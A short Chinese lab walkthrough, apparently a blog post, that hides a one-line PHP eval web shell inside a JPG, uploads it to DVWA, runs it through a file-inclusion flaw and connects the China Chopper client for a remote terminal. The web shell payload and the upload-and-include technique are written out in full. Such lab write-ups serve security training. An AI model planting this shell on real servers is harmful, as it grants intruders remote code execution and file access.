1、先制作图片一句话木马:
找好一张图片如”fox.jpg“,并且准备好一句话脚本php文件fox.php,在图片所在文件夹打开cmd命令行,执行命令:copy fox.jpg/b+fox.php/a fox1.jpg,生成图片一句话文件fox1.jpg
接下来用notepad++打开fox1.php图片,看看一句话也没有写入到图片当中,如图,一句话已经写入刀图片当中:
2、把图片一句话木马上传刀dvwa文件上传漏洞中,如图,上传成功:
拼接url得到:http://localhost/DVWA-master/DVWA-master/hackable/uploads/fox1.jpg
3、利用文件包含漏洞,将图片按照php来解析
http://ip/dvwa/vulnerabilities/fi/?page=include.php
修改page=include.php为page=文件路径即可,注意这里修改为low级别来利用文件包含。访问拼接的url来解析。
4、菜刀连接url,右击添加,填写url与密码(密码为一句话脚本的密码,如<?php @eval($_POST['password']);?>的密码为password),选择脚本类型,点击添加,添加完后,新增一条记录。
此时菜刀已经连接成功,可以访问文件/打开虚拟终端
(ps:感谢评论的提醒,当时写的时候比较匆忙,出现了错误,已改过来。)